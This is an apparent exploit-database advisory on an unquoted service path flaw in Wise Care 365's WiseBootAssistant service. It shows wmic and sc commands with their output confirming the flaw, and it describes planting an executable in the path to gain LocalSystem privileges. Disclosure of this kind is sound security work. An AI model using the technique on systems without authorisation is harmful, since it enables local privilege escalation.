39 lines
No EOL
1.6 KiB
Text
39 lines
No EOL
1.6 KiB
Text
# Exploit Title: Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path
|
|
# Date: 2021-06-18
|
|
# Exploit Author: Julio Aviña
|
|
# Vendor Homepage: https://www.wisecleaner.com/wise-care-365.html
|
|
# Software Link: https://downloads.wisecleaner.com/soft/WiseCare365_5.6.7.568.exe
|
|
# Version: 5.6.7.568
|
|
# Service File Version 1.2.4.54
|
|
# Tested on: Windows 10 Pro x64 es
|
|
# Vulnerability Type: Unquoted Service Path
|
|
|
|
|
|
# 1. To find the unquoted service path vulnerability
|
|
|
|
C:\>wmic service where 'name like "%WiseBootAssistant%"' get displayname, pathname, startmode, startname
|
|
|
|
DisplayName PathName StartMode StartName
|
|
Wise Boot Assistant C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe Auto LocalSystem
|
|
|
|
# 2. To check service info:
|
|
|
|
C:\>sc qc "WiseBootAssistant"
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: WiseBootAssistant
|
|
TIPO : 110 WIN32_OWN_PROCESS (interactive)
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 1 NORMAL
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : Wise Boot Assistant
|
|
DEPENDENCIAS :
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem
|
|
|
|
|
|
# 3. Exploit:
|
|
|
|
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
|
|
When restarting the service or the system, the inserted executable will run with elevated privileges. |